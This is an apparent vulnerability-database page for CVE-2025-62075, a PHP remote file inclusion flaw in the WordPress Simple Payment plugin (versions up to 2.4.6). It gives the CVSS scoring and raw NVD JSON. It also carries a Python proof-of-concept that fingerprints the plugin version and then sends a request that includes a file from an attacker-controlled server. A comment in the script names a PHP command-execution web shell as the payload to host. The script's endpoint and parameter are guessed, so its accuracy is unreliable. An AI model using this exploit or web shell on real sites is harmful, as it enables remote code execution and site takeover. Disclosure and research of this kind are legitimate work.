Security Vulnerability Report
中文
CVE-2025-62075 CVSS 7.5 HIGH

CVE-2025-62075

Published: 2025-11-06 16:16:13
Last Modified: 2026-04-27 17:16:32

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ido Kobelkowsky Simple Payment simple-payment.This issue affects Simple Payment: from n/a through <= 2.4.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Simple Payment插件 <= 2.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62075 PoC - WordPress Simple Payment Plugin RFI # Affected Version: <= 2.4.6 # Target: WordPress site with Simple Payment plugin installed import requests import sys def exploit_rfi(target_url, attacker_server): """ Exploit Remote File Inclusion vulnerability in Simple Payment plugin Args: target_url: Base URL of the vulnerable WordPress site attacker_server: URL of the attacker's server hosting malicious file """ # Malicious PHP payload to be hosted on attacker_server # <?php system($_GET['cmd']); ?> # Target endpoint vulnerable to LFI/RFI vulnerable_param = 'page' # Common parameter name, adjust based on enumeration # Method 1: Remote File Inclusion payload = f"http://{attacker_server}/malicious.txt" exploit_url = f"{target_url}/wp-admin/admin.php?page={payload}" print(f"[*] Sending RFI payload: {exploit_url}") try: response = requests.get(exploit_url, timeout=10) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Potential successful inclusion detected") print(f"[*] Response preview: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def check_version(target_url): """ Check installed version of Simple Payment plugin """ version_urls = [ f"{target_url}/wp-content/plugins/simple-payment/readme.txt", f"{target_url}/wp-content/plugins/simple-payment/simple-payment.php" ] for url in version_urls: try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[*] Found: {url}") # Extract version if present if 'Version:' in response.text: for line in response.text.split('\n'): if 'Version:' in line: print(f"[+] Detected version: {line.strip()}") except: pass if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-62075.py <target_url> <attacker_server>") print("Example: python cve-2025-62075.py http://victim.com http://attacker.com") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] print(f"[*] Target: {target}") print(f"[*] Attacker Server: {attacker}") # Check version first check_version(target) # Attempt exploitation exploit_rfi(target, attacker)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62075", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:13.067", "lastModified": "2026-04-27T17:16:31.737", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ido Kobelkowsky Simple Payment simple-payment.This issue affects Simple Payment: from n/a through <= 2.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-payment/vulnerability/wordpress-simple-payment-plugin-2-4-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}